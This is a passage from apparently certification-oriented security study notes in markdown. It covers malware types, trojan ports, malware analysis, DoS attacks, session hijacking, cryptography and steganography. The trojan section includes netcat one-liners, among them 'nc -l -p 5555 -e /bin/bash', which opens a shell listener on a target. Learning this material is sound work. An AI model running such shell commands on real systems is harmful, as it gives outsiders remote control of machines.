port mapping and forwarding and proxying 81 | - Connect: `nc -e IPaddress Port#` 82 | - Open a listening port on 55555 from target machine: `nc -l -p 5555 -e /bin/bash` 83 | - **CryptCat**: encrypted version of netcat 84 | 85 | ##### Some Trojan Port Numbers 86 | 87 | | Trojan Name | Port | 88 | | :---------------- | :------ | 89 | | Death | 2 | 90 | | Senna Spy | 20 | 91 | | Hackers Paradise | 31,456 | 92 | | TCP Wrappers | 421 | 93 | | Doom, Santaz Back | 666 | 94 | | Silencer, WebEx | 1001 | 95 | | RAT | 1095-98 | 96 | | SubSeven | 1243 | 97 | | Shiva-Burka | 1600 | 98 | | Trojan Cow | 2001 | 99 | | Deep Throat | 6670-71 | 100 | | NetBus | 12345-6 | 101 | | Whack a Mole | 12361-3 | 102 | | Back Orifice | 31337,8 | 103 | 104 | ##### Tools 105 | 106 | - **Process Explorer** \(PE\): Microsoft tool that shows you everything about running processes 107 | - **Registry Monitoring Tools** 108 | - SysAnalyzer 109 | - Active Registry Monitor 110 | - Regshot 111 | - **Tripwire**: integrity verifier that can act as a HIDS in protection against Trojans 112 | - **SIGVERIF**: building into Windows to verify the integrity of the system 113 | - Log file can be found at c:\windows\system32\sigverif.txt 114 | - Looking for drivers that are not signed 115 | 116 | #### Virus 117 | 118 | - Self-replicating program that reproduces by attaching copies of itself into other executable code 119 | - Usually installed by user clicking on malicious file attachments or downloads 120 | 121 | ##### Types of Viruses 122 | 123 | - **Virus Hoax**: a kind of bluff and false alarm claiming reports about nonexistent viruses to cause fear 124 | - **Fake Antivirus**: trying to convince a user has a virus and have them download an AV that is a virus itself 125 | - **Ransomware**: malicious software designed to deny access to a computer until a price is paid; usually spread through email 126 | - **Locky**: Using RSA-2048 and AES-128 to lock files 127 | - **WannaCry**: famous ransomware, within 24 hours had 230,000 victims, exploited unpatched SMB vulnerability 128 | - **Petya-NotPetya**: spreading over network using WMIC \(Windows Management Instrumentation Command-line\) by capturing all credentials from local machine using Mimikatz 129 | - **Boot Sector Virus**: known as system virus, moving boot sector to another location and then inserts its code in the original location 130 | - **Shell Virus**: wrapping around an application's code, inserting itself before the application's 131 | - **Cluster Virus**: modifying directory table entries so every time a file or folder is opened, the virus runs 132 | - **Multipartite Virus** 133 | - Attempting to infect both boot sector and files 134 | - Generally referring to viruses with multiple infection methods, or executing different in different places on target at the same time 135 | - **Macro Virus**: written in VBA, infects template files, mostly MS Word and MS Excel 136 | - **Polymorphic Code Virus**: mutating its code by using a polymorphic engine; difficult to find because code is always changing 137 | - **Encryption Virus**: using encryption to hide the code from antivirus 138 | - **Metamorphic Virus**: rewriting itself every time it infects a new file 139 | - Win32/ Simile 140 | - Zmist: Mistfall is the first virus uses technique called code integration. This code inserts itself into other code and regenerates code and rebuilds the executable 141 | - **Stealth Virus**: known as tunneling virus, attempts to evade AVs by actively altering and corrupting the service call interrupts while running 142 | - **Cavity Virus**: overwriting portions of host files as to not increase the actual size of the file; uses null content sections 143 | - **Armored Virus**: containing a variety of mechanisms specifically coded to make its detection and decryption very difficult 144 | - **Companion/Camouflage Virus**: spoofing a scanner by camouflaging itself to the identical file name as targeted program file 145 | - **Cluster Virus**: modifying directory table entries so that it points users or system processes to the virus code instead of the actual program 146 | - **Sparse Infector Virus** 147 | - Only infecting occasionally, like every tenth program executed 148 | - Deciding which file to infect based on certain conditions, like target file with max. size of 128kb 149 | - **File Extension Virus**: changing the file extensions of files to take advantage of most people having them turned off \(readme.txt.vbs shows as readme.txt\) 150 | - **Logic Bomb Virus**: triggered by a response to an event, such as launching an application or when a specific date/time is reached 151 | 152 | #### Worm 153 | 154 | - Self-replicating malware that sends itself to other computers without human intervention 155 | - Usually doesn't infect files, just resides in active memory 156 | - Often used in botnets 157 | 158 | ### Analyzing Malware 159 | 160 | - **Sheep Dip**: referring to analysis of suspect files 161 | - **Sheep Dip Computer**: installed with port monitors, file monitors, network monitors and antivirus software, connects to a network only under strictly controlled conditions 162 | 163 | #### Static Analysis 164 | 165 | - Dismantling of a given executable into binary format to study its functionalities and features 166 | - Tools 167 | - HashMyFiles: file fingerprinting 168 | - VirusTotal: online malware scanning 169 | - PEiD: identifying packing/obfuscation methods 170 | - Dependency Walker: listing all dependent modules of an executable file 171 | - IDA Pro: disassembler and debugger 172 | 173 | #### Dynamic Analysis 174 | 175 | - Running malware and identifying changes to the system, usually in a sandbox environment 176 | 1. Make sure you have a good test bed 177 | - Use a VM with NIC in host-only mode and no open shares 178 | 2. Analyze the malware on the isolated VM in a static state 179 | - Tools - binText and UPX help with looking at binary 180 | 3. Run the malware and check out processes 181 | - Use Process Monitor, etc. to look at processes 182 | - Use NetResident, TCPview or even Wireshark to look at network activity 183 | 4. Check and see what files were added, changed, or deleted 184 | 185 | #### Heuristic Analysis 186 | 187 | - Detecting new or unknown viruses that are usually variants of an already existing virus family 188 | - Drawback: too many false positives 189 | - Can be static or dynamic 190 | - **Static Heuristic Analysis**: The anti-virus analyzes the file format and code structure to determine if the code is viral 191 | - **Dynamic Heuristic Analysis**: The anti-virus performs a code emulation of the suspicious code to determine if the code is viral 192 | 193 | #### Tools 194 | 195 | - IDA Pro 196 | - Anubis 197 | - Threat Analyzer 198 | 199 | ### Preventing Malware 200 | 201 | - Make sure you know what is going on in your system 202 | - Have a good antivirus that is up to date 203 | - **DEP** \(Data Execution Prevention\): prevents from accidentally executing a potentially malicious batch or PowerShell script in Windows 204 | - **DLP** \(Data Loss Prevention\): a strategy for preventing end users from sending sensitive or critical information outside of the corporate network 205 | 206 | ### DoS \(Denial of Service\) Attacks 207 | 208 | - Seeking to take down a system or deny access to it by authorized users 209 | - **Botnet**: network of zombie computers a hacker uses to start a distributed attack 210 | - Can be controlled over HTTP, HTTPS, IRC, or ICQ 211 | 212 | #### Basic Categories 213 | 214 | - **Fragmentation Attack**: taking advantage of the system's ability to reconstruct fragmented packets 215 | - **Volumetric Attack**: bandwidth attack, consuming all bandwidth for the system or service 216 | - **Application Attack** 217 | - Consuming the resources necessary for the application to run 218 | - Application level attack is against weak code 219 | - Application attack is just the general term 220 | - **TCP state-exhaustion Attack**: going after load balancers, firewalls and application servers by attacking connection state tables 221 | - **SYN Flood**: sending thousands of SYN packets with fake source IP address and not responding to the SYN/ACK packets; lots of half connections where the 3-way hanndshake is never completed; eventually target runs out of resources 222 | - **ICMP flood**: sending ICMP ECHO packets with a spoofed address; eventually reaches limit of packets per second sent 223 | - **Smurf**: sending large number of pings to the broadcast address of the subnet with source IP spoofed as the target, entire subnet responds exhausting the target; using ICMP ECHO requests 224 | - **Fraggle**: same as Smurf but with UDP packets 225 | - **Ping of Death**: fragmenting ICMP messages, after reassembled, ICMP packet is larger than the maximum size and crashes the system 226 | - **Teardrop**: overlapping numerous garbled TCP/IP fragments with oversized payloads, causes older systems to crash due to fragment reassembly 227 | - **Phlashing**: also known as bricking a system, causing permanent damage to a system 228 | - **LAND Attack** \(Local Area Network Denial\): sending a TCP SYN packet to the target with a spoofed IP the same as the target; if vulnerable, target loops endlessly and crashes 229 | - **DDoS** \(Distributied Denial of Service\): incoming traffic flooding the victim originates from many different sources 230 | - **DRDoS** \(Distributied Reflexion Denial of Service\): using IP spoofing, the source address is set to targeted victim, which means all the replies will go to the target and flood the target 231 | - **Slowloris**: trying to keep many connections to the target web server open and hold them open as long as possible 232 | 233 | #### Tools 234 | 235 | - Low Orbit Ion Cannon \(LOIC\): DDoS tool that floods a target with TCP, UDP or HTTP requests 236 | - Trinity: Linux based DDoS tool 237 | 238 | ### Session Hijacking 239 | 240 | - Attacker waits for a session to begin and after the victim authenticates, steals the session for himself 241 | - Predicting can be done by knowing the window size and the packet sequence number 242 | - Also can be done via brute force, calculation or stealing 243 | 244 | #### Steps 245 | 246 | 1. Sniff the traffic between the client and server 247 | 2. Monitor the traffic and predict the sequence numbering 248 | 3. Desynchronize the session with the client 249 | 4. Predict the session token and take over the session 250 | 5. Inject packets to the target server 251 | 252 | #### Countermeasures 253 | 254 | - Using unpredictable session IDs 255 | - Limiting incoming connections 256 | - Minimizing remote access 257 | - Regenerating the session key after authentication 258 | - Using **IPsec** to encrypt 259 | 260 | #### IPsec \(Internet Protocol Security\) 261 | 262 | - **Transport Mode** 263 | - Payload and ESP trailer are encrypted, not IP header 264 | - Can be used in NAT because the original packet is still routed in exactly the same manner as it would have been without IPsec 265 | - **Tunnel mode** 266 | - Everything is encrypted 267 | - Cannot be used with NAT 268 | - **Architecture Protocols** 269 | - **Authentication Header**: guarantying the integrity and authentication of IP packet sender 270 | - **Encapsulating Security Payload** \(ESP\): providing origin authenticity and integrity as well as confidentiality 271 | - **Internet Key Exchange** \(IKE\): producing the keys for the encryption/decryption process, port 500 272 | - **Oakley**: using Diffie-Hellman to create master and session keys 273 | - **Internet Security Association Key Management Protocol** \(ISAKMP\): software that facilitates encrypted communication between two endpoints 274 | 275 | #### Tools 276 | 277 | - **Ettercap**: man-in-the-middle tool and packet sniffer on steroids 278 | - **Zaproxy** 279 | - **Paros proxy** 280 | - **Burp Suite** 281 | - **Hamster** 282 | - **IKE-scan**: IPsec VPN scanning and fingerprinting tool 283 | -------------------------------------------------------------------------------- /11-cryptography.md: -------------------------------------------------------------------------------- 1 | # 11-Cryptography 2 | 3 | ## Table of Contents 4 | 5 | - [Cryptography](11-cryptography.md#cryptography) 6 | - [Cryptography Basics](11-cryptography.md#cryptography-basics) 7 | - [Classical Ciphers](11-cryptography.md#classical-ciphers) 8 | - [Modern Ciphers](11-cryptography.md#modern-ciphers) 9 | - [Based on type of key used](11-cryptography.md#based-on-type-of-key-used) 10 | - [Based on type of input data](11-cryptography.md#based-on-type-of-input-data) 11 | - [Cryptanalysis Methods](11-cryptography.md#cryptanalysis-methods) 12 | - [Code Breaking Methodologies](11-cryptography.md#code-breaking-methodologies) 13 | - [Encryption Algorithms and Techniques](11-cryptography.md#encryption-algorithms-and-techniques) 14 | - [Encryption types in OSI](11-cryptography.md#encryption-types-in-osi) 15 | - [Symmetric Encryption](11-cryptography.md#symmetric-encryption) 16 | - [DES \(Data Encryption Standard\)](11-cryptography.md#des-data-encryption-standard) 17 | - [3DES \(Triple Data Encryption Standard\)](11-cryptography.md#3des-triple-data-encryption-standard) 18 | - [AES \(Advanced Encryption Standard\)](11-cryptography.md#aes-advanced-encryption-standard) 19 | - [RC \(Rivest Cipher\)](11-cryptography.md#rc-rivest-cipher) 20 | - [Blowfish](11-cryptography.md#blowfish) 21 | - [Twofish](11-cryptography.md#twofish) 22 | - [Asymmetric Encryption](11-cryptography.md#asymmetric-encryption) 23 | - [RSA \(Rivest–Shamir–Adleman\)](11-cryptography.md#rsa-rivestshamiradleman) 24 | - [Diffie-Hellman](11-cryptography.md#diffie-hellman) 25 | - [ECC \(Elliptic Curve Cryptosystem\)](11-cryptography.md#ecc-elliptic-curve-cryptosystem) 26 | - [Public Key Infrastructure \(PKI\)](11-cryptography.md#public-key-infrastructure-pki) 27 | - [Components of PKI](11-cryptography.md#components-of-pki) 28 | - [PKI Process Flow](11-cryptography.md#pki-process-flow) 29 | - [Digital Certificates](11-cryptography.md#digital-certificates) 30 | - [Digital Signatures](11-cryptography.md#digital-signatures) 31 | - [Digital Signature workflow](11-cryptography.md#digital-signature-workflow) 32 | - [Full Disk Encryption \(FDE\)](11-cryptography.md#full-disk-encryption-fde) 33 | - [Encrypted Communication](11-cryptography.md#encrypted-communication) 34 | - [Secure Sockets Layer \(SSL\)](11-cryptography.md#secure-sockets-layer-ssl) 35 | - [Channelsecurity](11-cryptography.md#channelsecurity) 36 | - [SSL/TLS handshake process](11-cryptography.md#ssltls-handshake-process) 37 | - [Transport Layer Security \(TLS\)](11-cryptography.md#transport-layer-security-tls) 38 | - [Two Layers](11-cryptography.md#two-layers) 39 | - [PGP \(Pretty Good Privacy\)](11-cryptography.md#pgp-pretty-good-privacy) 40 | - [PGP Encryption and Decryption Workflow](11-cryptography.md#pgp-encryption-and-decryption-workflow) 41 | - [Cryptography Attacks](11-cryptography.md#cryptography-attacks) 42 | - [Hash Algorithms](11-cryptography.md#hash-algorithms) 43 | - [MD5 \(Message Digest algorithm\)](11-cryptography.md#md5-message-digest-algorithm) 44 | - [SHA \(Secure Hash Algorithms\)](11-cryptography.md#sha-secure-hash-algorithms) 45 | - [RIPEMD \(RACE Integrity Primitives Evaluation Message Digest\)](11-cryptography.md#ripemd-race-integrity-primitives-evaluation-message-digest) 46 | - [Attacks](11-cryptography.md#attacks) 47 | - [Steganography](11-cryptography.md#steganography) 48 | - [Methods](11-cryptography.md#methods) 49 | - [Ways to Identify](11-cryptography.md#ways-to-identify) 50 | - [Tools](11-cryptography.md#tools) 51 | 52 | ## Cryptography 53 | 54 | ### Cryptography Basics 55 | 56 | - Science or study of protecting information whether in transit or at rest 57 | - Rendering the information unusable to anyone who can't decrypt it 58 | - Taking plain text, applies cryptographic method, turn it into cipher text 59 | - **Cipher**: an algorithm performing encryption and decryption 60 | 61 | #### Classical Ciphers 62 | 63 | - **Substitution**: bits are replaced by other bits 64 | - **Transposition**: not replacing, simply changes order 65 | 66 | #### Modern Ciphers 67 | 68 | ##### Based on type of key used 69 | 70 | - **Private Key**: same key used for encryption and decryption 71 | - **Public Key**: 2 different keys used for encryption and decryption 72 | 73 | ##### Based on type of input data 74 | 75 | - **Block Cipher** 76 | - Data bits are split up into blocks and fed into the cipher 77 | - Each block of data \(usually 64 bits\) is encrypted with key and algorithm 78 | - Simpler and slower than stream ciphers 79 | - Key chosen for cipher must have a length larger than the data, if not, it is vulnerable to frequency attacks 80 | - **Stream Cipher** 81 | 82 | - Readable bits are encrypted one at a time in a continuous stream 83 | - Working at a high rate of speed 84 | - Usually done by an XOR operation \(exclusive or\) 85 | 86 | ```text 87 | 0 XOR 0 = 0 88 | 1 XOR 1 = 0 89 | 0 XOR 1 = 1 90 | 1 XOR 0 = 1 91 | ``` 92 | 93 | #### Cryptanalysis Methods 94 | 95 | - Study and methods used to crack cipher text 96 | - **Linear Cryptanalysis** 97 | - Working best on block ciphers 98 | - Given enough pairs of plaintext and corresponding ciphertext, key can be obtained 99 | - **Differential Cryptanalysis** 100 | - Applying to symmetric key algorithms 101 | - Comparing differences in the inputs to how each one affects the outcome 102 | - Working with **chosen plaintext** originally, also works with **known plaintext and ciphertext** 103 | - **Integral Cryptanalysis** 104 | - Useful against block ciphers 105 | - Input vs Output comparison same as differential, however, runs multiple computations of the same block size input 106 | 107 | #### Code Breaking Methodologies 108 | 109 | - **Brute Force**: exhaustive search, keys are determined by trying every possible combination of characters 110 | - **Frequency Analysis**: study of the frequency of letters or groups of letters in a ciphertext, can be used to crack a substitution cipher, like rotation cipher ROT13 111 | - **Trickery and Deceit** 112 | - Requiring a high level of mathematical and cryptographic skills 113 | - Using social engineering techniques to trick someone to encrypt and send a known message 114 | - **One-time Pad** 115 | - Assuming to be unbreakable 116 | - A shared random key that has to be the same length or longer than the cipher text 117 | - Each individual bit or character of plaintext is encrypted by combining it with the corresponding bit or character from the pad using modular addition 118 | - **Drawback**: key length is same as that of message, impossible to encrypt and send large messages 119 | 120 | ### Encryption Algorithms and Techniques 121 | 122 | - **Algorithm**: step-by-step method of solving a problem 123 | - **Encryption Algorithms**: mathematical formulas used to encrypt and decrypt data 124 | - Keys should still change on a regular basis even though they may be "unhackable" 125 | - Per U.S. Government, an algorithm using at least a 256-bit key cannot be cracked 126 | 127 | #### Encryption types in OSI 128 | 129 | | Encryption type | OSI layer | 130 | | :--------------------------------------- | :---------------------------------------------------- | 131 | | Link encryption | 2, everything including original headers is encrypted | 132 | | Network encryption | 3, everything in the packet is encrypted | 133 | | Protocol encryption | 4, specific protocols are entirely encrypted eg. SSL | 134 | | Service based encryption | 5, encryption for specific services on specific hosts | 135 | | Data encryption | 6 | 136 | | Application based information encryption | 7 | 137 | 138 | ### Symmetric Encryption 139 | 140 | - One key is used to encrypt and decrypt the data, known as single key or shared key 141 | - Problems include key distribution and management 142 | - Suitable for large amounts of data 143 | - Harder for groups of people because more keys are needed as group increases 144 | - Doing nothing for non-repudiation, only performs confidentiality 145 | 146 | #### DES \(Data Encryption Standard\) 147 | 148 | - Block cipher, 56-bit key, 64-bit block size 149 | - Quickly outdated and now considered not very secure 150 | - Kerberos 1-4 used DES 151 | 152 | #### 3DES \(Triple Data Encryption Standard\) 153 | 154 | - Block cipher, 168-bit key 155 | - More effective than DES but much slower 156 | - 3 keys are used: 157 | - 1st key is used to encrypt the plain text 158 | - 2nd key is used to decrypt ciphertext resulting from the first round of encryption 159 | - 3rd key is used to encrypt the ciphertext that resulted from the decryption with the 2nd key 160 | 161 | #### AES \(Advanced Encryption Standard\) 162 | 163 | - Iterated block cipher, 128, 192 or 256 bit key, 128-bit block size 164 | - Symmetric key algorithm 165 | - Working by repeating same operation multiple times 166 | - Replacing DES, much faster than DES and 3DES 167 | - Original name is Rijndael 168 | 169 | #### RC \(Rivest Cipher\) 170 | 171 | - RC4 is a symmetric key **stream** cipher 172 | - RC5 is a parameterized algorithm with variable block size, 128-bit key, 2-bit working registers 173 | - RC6 is a symmetric key block cipher, uses integer multiplication and 4-bit working registers 174 | 175 | #### Blowfish 176 | 177 | - Fast symmetric block cipher, 64-bit block size, 32 to 448 bits key 178 | - Replaced by AES 179 | - Considered public domain 180 | 181 | #### Twofish 182 | 183 | - Block cipher, 128-bit block, up to 256 bit key 184 | 185 | ### Asymmetric Encryption 186 | 187 | - Using two types of keys for encryption and decryption 188 | - One key encrypts, the other decrypts 189 | - The private key is used to digitally sign a message 190 | 191 | #### RSA \(Rivest–Shamir–Adleman\) 192 | 193 | - Achieving strong encryption through the use of two large prime numbers 194 | - Factoring two prime numbers to create key sizes up to 4096 bits 195 | - Modern de-facto encryption standard 196 | - **Downside**: slower than symmetric especially on bulk encryption and processing power 197 | 198 | #### Diffie-Hellman 199 | 200 | - Developed as a key exchange protocol 201 | - Used in SSL and IPsec 202 | - If digital signatures are waived, vulnerable to MITM attacks 203 | 204 | #### ECC \(Elliptic Curve Cryptosystem\) 205 | 206 | - Using points on elliptical curve along with logarithmic problems 207 | - Using less processing power, smaller keys, good for mobile devices 208 | 209 | ### Public Key Infrastructure \(PKI\) 210 | 211 | - Structure designed to verify and authenticate the identity of individuals 212 | - **Cross-Certification** 213 | - Allowing a CA to trust another CS in a completely different PKI 214 | - Allowing both CAs to validate certificates from either side 215 | - **Single-authority system**: CA at the top that creates and issues certificates 216 | - **Hierarchical trust system** 217 | - CA at the top \(root CA\) 218 | - Making use of one or more RAs \(subordinate CAs\) underneath it to issue and manage certificates 219 | 220 | #### Components of PKI 221 | 222 | - **Certificate Management System**: generates, distributes, stores, and verifies certificates 223 | - **Validation Authority**: \(VA\) used to validate certificates, stores certificates with their public keys 224 | - **Certificate Authority**: \(CA\) third party to issue and verify digital certificates 225 | - Comodo 226 | - IdentTrust 227 | - Symantec 228 | - GoDaddy 229 | - **End user**: requests, manages, and uses certificates 230 | - **Registration Authority**: \(RA\) acts as verifier for the certificate authority 231 | 232 | #### PKI Process Flow 233 | 234 | A user applies for a certificate with his public key at a RA. RA confirms the user's identity to CA which in turn issues the certificate. The user can then digitally sign a contract using his new certificate. His identity is then checked by the contracting party with a VA which again receives information about issued certificates by the CA. 235 | 236 | ```text 237 | Cert. info 238 | --------> CA --------------------------> VA 239 | | | |^ 240 | |OK | || 241 | | | || 242 | RA |Cert. OK || Cert. 243 | ^ | || 244 | |Pub. K | || 245 | | v Sign with Cert. v| 246 | --------- User ---------------> Contracing Party 247 | ``` 248 | 249 | ### Digital Certificates 250 | 251 | - **Certificate**: electronic file that is used to verify a user's identity, provides non-repudiation 252 | - **Non-repudiation**: a recipient can ensure the identity of the sender and neither party can deny sending 253 | - **X.509**: standard used for digital certificates, public key encryption 254 | - **Self-Signed Certificates** 255 | - Not signed by a CA 256 | - Signed by the same entity it certifies 257 | - Generally not used for public, used for development purposes 258 | - The certificate verification rarely occurs due to necessity of disclosing the private key 259 | 260 | ### Digital Signatures 261 | 262 | - Unforgeable and authentic 263 | - When signing a message, you sign it with your **private** key and the recipient decrypts the hash with your **public** key 264 | - **Digital Signature Algorithm** \(DSA\): used in generation and verification of digital signatures per FIPS 186-2 265 | 266 | #### Digital Signature workflow 267 | 268 | ```text 269 | - Sign 270 | Hashing Algo. Digital Sign 271 | Message --------------> Message -------------------------> Message 272 | + hash value using sender's PRIVATE key + singed hash 273 | 274 | - Seal 275 | Encrypt Seal 276 | ----------------> Encrypted message --------------------------> Sealed message 277 | using one-time + sysmmetric key Encrypt sysmmetric key 278 | sysmmetric key using recipient's PUBLIC key 279 | 280 | - Open 281 | Decrypt Decrypt 282 | Sealed message ---------------------------> Encrypted message --------------------> Message 283 | with recipient's PRIVATE key + sysmmetric key with sysmmetric key + signed hash 284 | 285 | - Verify 286 | Unlock signed hash Rehash message & Compare 287 | -----------------------> Message -------------------------> Verified message 288 | with sender's PUBLIC key + Hash value 289 | ``` 290 | 291 | ### Full Disk Encryption \(FDE\) 292 | 293 | - Encrypting every bit of data stored on a disk or a disk volume 294 | - Working similar to text-message encryption and protects data even OS is not active 295 | - Preventing real-time exchange of information from compromising threats 296 | - Ensuring security of the system 297 | - Tools 298 | - VeraCrypt 299 | - Symantec Drive Encryption 300 | - BitLocker Drive Encryption 301 | 302 | ### Encrypted Communication 303 | 304 | #### Secure Sockets Layer \(SSL\) 305 | 306 | - Using both asymmetric and symmetric authentication mechanisms 307 | - Encrypting data at Transport Layer and above 308 | - Using RSA asymmetric encryption and digital certificates 309 | - Having largely been replaced by TLS 310 | 311 | ##### Channelsecurity 312 | 313 | - **Private channel**:: encrypted messages, a simple handshake defines secret key 314 | - **Authenticated channel**: encrypted server endpoint, client endpoint is optionally authenticated 315 | - **Reliable channel**: message transfer has an integrity check 316 | 317 | ##### SSL/TLS handshake process 318 | 319 | ```text 320 | -------- -------- 321 | │Client│ │Server│ 322 | -------- -------- 323 | │ │ 324 | │ Cipher Suite │ 325 | │--------------------------------------------->│ 326 | │ │ 327 | │ SSL Cert. (Public Key) │ 328 | │<---------------------------------------------│ 329 | │ │ 330 | Public Key │ 331 | Verified │ 332 | │ Encrypted Session Key │ 333 | │ (generated using server Public Key) │ 334 | │--------------------------------------------->│ 335 | │ Session Key 336 | │ decrypted 337 | │ Session Key is in place │ 338 | │<-------------------------------------------->│ 339 | │ │ 340 | │ Session Key used for encryption & decryption │ 341 | │<-------------------------------------------->│ 342 | -------- -------- 343 | │Client│ │Server│ 344 | -------- -------- 345 | ``` 346 | 347 | #### Transport Layer Security \(TLS\) 348 | 349 | - Using RSA 1024 and 2048 bits, successor to SSL 350 | - Allowing both client and server to authenticate to each other 351 | - TLS Record Protocol provides secured communication channel 352 | 353 | ##### Two Layers 354 | 355 | - **TLS Record Protocol** 356 | - Connection is private: using symmetric cryptography for data encryption 357 | - Connection is reliable: providing message integrity check 358 | - **TLS Handshake Protocol** 359 | - Providing connection security that has three basic properties: 360 | - The peer's identity can be authenticated using asymmetric cryptography 361 | - The negotiation of a shared secret is secure 362 | - The negotiation is reliable 363 | - TLS Handshake Protocol operates on top of TLS record layer 364 | 365 | #### PGP \(Pretty Good Privacy\) 366 | 367 | - Features conventional and public key cryptography 368 | - The file format uses asymmetric encryption to encrypt a symmetric encryption key 369 | - The symmetric encryption key encrypts the data 370 | - Both symmetric and asymmetric keys are used, known as hybrid cryptosystem 371 | - Used for signing, compress and encryption of emails, files and directories 372 | - Using a decentralized model, called web of trust, where individual users sign keys that belong to other people to validate that key are who they say they are 373 | 374 | ##### PGP Encryption and Decryption Workflow 375 | 376 | ```text 377 | - Encryption 378 | Compress Encrypt 379 | Data ----------------> -----------------------------> Cipher text 380 | reduce patterns with Random key as secret key 381 | 382 | Encrypt 383 | Random key --------------------------> Encrypted Random key 384 | with recipient's PUBLIC key 385 | 386 | - Decryption 387 | Decrypt 388 | Encrypted Random key ---------------------------> Random key 389 | with recipient's PRIVATE key 390 | 391 | Decrypt 392 | Cipher text ---------------> Data 393 | with Random key 394 | ``` 395 | 396 | ### Cryptography Attacks 397 | 398 | - **Known-plaintext Attack** \(KPA\) 399 | - Obtaining some plaintext blocks along with corresponding ciphertext and cipher 400 | - Working on block ciphers, linear cryptanalysis 401 | - **Ciphertext-only Attack**: \(COA\) 402 | - Gaining copies of several ciphertexts with the same algorithm 403 | - Recovering encryption key from ciphertext 404 | - **Chosen-plaintext Attack** \(CPA\) 405 | - Obtaining ciphertexts corresponding to a set of plaintexts of attacker's own choosing 406 | - Attempting to derive the key used 407 | - **Adaptive Chosen-plaintext Attack** 408 | - Modifying content of message by making a series of interactive queries, choosing subsequent plaintexts based on the information from the previous encryptions 409 | - **Chosen-Ciphertext Attack** \(CCA\) 410 | - Obtaining plaintexts corresponding to a set of ciphertexts of attacker's own choosing 411 | - Must have access to communication channel between sender and receiver 412 | - **Lunchtime Attack** or **Midnight Attack**: attacker can have access to system for only a limited amount of time, can access only few plaintext-ciphertext pairs 413 | - **Adaptive Chosen-ciphertext** \(CCA2\): selecting a series of ciphertexts and then observes the resulting plaintext blocks 414 | - **Related-key Attack**: obtaining ciphertexts encrypted under two different keys, useful if attacker can obtain plaintext and matching ciphertext 415 | - **Dictionary Attack**: constructing a dictionary of plaintext along with its corresponding ciphertext 416 | - **Chosen-key Attack**: breaking an n bit key cipher into 2^n/2 numbers of operations 417 | - **Timing Attack**: repeatedly measuring exact execution times of modular exponentiation operations 418 | - **Meet-in-the-middle Attack** 419 | - Using some sort of time-space trade-off to drastically reduce the effort to perform a brute-force attack \(e.g., transforming an attack that requires 2exp128 time into one that takes 2exp64 time and 2exp64 space\) 420 | - May also refer to a type of attack over certain block ciphers, where the attacker decompose the problem in two halves and proceeds on each part separately 421 | - **Side-Channel Attack**: monitoring environmental factors such as power consumption, timing and delay 422 | - **DUHK Attack** \(Don't Use Hard-Coded Keys\) 423 | - Allowing attackers to access keys in certain VPN implementations 424 | - Affecting devices using ANSI X9.31 with a hard-coded seed key 425 | - **Escrow key** 426 | - Stored in a safe place by a trusted third party 427 | - Enabling companies to remain compliant with government mandates regarding its ability to gain access when necessary 428 | - Government Access to Keys \(GAK\) allowing the government to gain access to encrypted communications without interference from the company being investigated 429 | - Tools 430 | - L0phtcrack: used mainly against Windows SAM files 431 | - John the Ripper: UNIX/Linux tool for the same purpose 432 | - CrypTool 433 | - Cryptobench 434 | 435 | ### Hash Algorithms 436 | 437 | - One-way mathematical function that produces a fix-length string \(hash\) based on the arrangement of data bits in the input 438 | - Used for integrity 439 | - **Salt**: used with a hash to obscure the hash, collection of random bits 440 | 441 | #### MD5 \(Message Digest algorithm\) 442 | 443 | - Produces 128 bit hash expressed as 32 digit hexadecimal number 444 | - Having serious flaws 445 | - Still used for file download verification 446 | 447 | #### SHA \(Secure Hash Algorithms\) 448 | 449 | - **SHA-1**: 160 bits, developed by NSA 450 | - **SHA-2** 451 | - Four separate hash functions 452 | - Outputs of 224, 256, 384 and 512 bits 453 | - SHA-256 uses 32-bit block words 454 | - SHA-512 uses 64-bit block words 455 | - **SHA-3**: using sponge construction 456 | 457 | #### RIPEMD \(RACE Integrity Primitives Evaluation Message Digest\) 458 | 459 | - 160-bit hash algorithm 460 | - Working through 80 stages made up of 6 blocks that executes 16 times each 461 | - Using modulo 32 addition 462 | 463 | #### Attacks 464 | 465 | - **Collision** 466 | - Occurring when two or more files create the same hash output 467 | - Rare but can happen and can be used an attack 468 | - **Birthday attack**: attack that depends on the higher likelihood of collisions found between random attack attempts and a fixed degree of permutations 469 | - **Rainbow Tables**: containing precomputed hashes to try and find out passwords 470 | - Tools 471 | - HashCalc 472 | - MD5 Calculator 473 | 474 | ### Steganography 475 | 476 | - Practicing of concealing a message inside another medium so that only the sender and recipient know of its existence 477 | - **Steganalysis**: the process of discovering the existence of the hidden information in a medium, the reverse process of steganography 478 | 479 | #### Methods 480 | 481 | - Least significant bit insertion: changes least meaningful bit 482 | - Makes and filters \(grayscale images\): like watermarking 483 | - Algorithmic transformation: hides in mathematical functions used in image compression 484 | - **Noisy areas**: noisy areas are those that draw less attention, like areas with a great deal of natural color variation in the image 485 | - **Transform domain technique**: Steganography hides the information in significant parts of the cover image such as cropping, compression, and some other image processing areas 486 | 487 | #### Ways to Identify 488 | 489 | - Text: character positions are key; blank spaces, text patterns 490 | - Image: file larger in size; some may have color palette faults 491 | - Audio & Video: require statistical analysis 492 | 493 | #### Tools 494 | 495 | - QuickStego 496 | - gifshuffle 497 | - MP3Stego 498 | - SNOW 499 | - OpenStego 500 | -------------------------------------------------------------------------------- /12-social_engineering.md: -------------------------------------------------------------------------------- 1 | # 12-Social Engineering 2 | 3 | ## Table of Contents 4 | 5 | - [Social Engineering](12-social_engineering.md#social-engineering) 6 | - [Social Engineering Phases](12-social_engineering.md#social-engineering-phases) 7 | - [Reasons This Works](12-social_engineering.md#reasons-this-works) 8 | - [Human-Based Attacks](12-social_engineering.md#human-based-attacks) 9 | - [Impersonation](12-social_engineering.md#impersonation) 10 | - [Eavesdropping](12-social_engineering.md#eavesdropping) 11 | - [Shoulder Surfing](12-social_engineering.md#shoulder-surfing) 12 | - [Dumpster Diving](12-social_engineering.md#dumpster-diving) 13 | - [Reverse Social Engineering](12-social_engineering.md#reverse-social-engineering) 14 | - [Piggybacking](12-social_engineering.md#piggybacking) 15 | - [Tailgating](12-social_engineering.md#tailgating) 16 | - [Rubber-hose Attack](12-social_engineering.md#rubber-hose-attack) 17 | - [Computer-Based Attacks](12-social_engineering.md#computer-based-attacks) 18 | - [Pop-Up Windows](12-social_engineering.md#pop-up-windows) 19 | - [Phishing](12-social_engineering.md#phishing) 20 | - [Spear Phishing](12-social_engineering.md#spear-phishing) 21 | - [Whaling](12-social_engineering.md#whaling) 22 | - [Pharming](12-social_engineering.md#pharming) 23 | 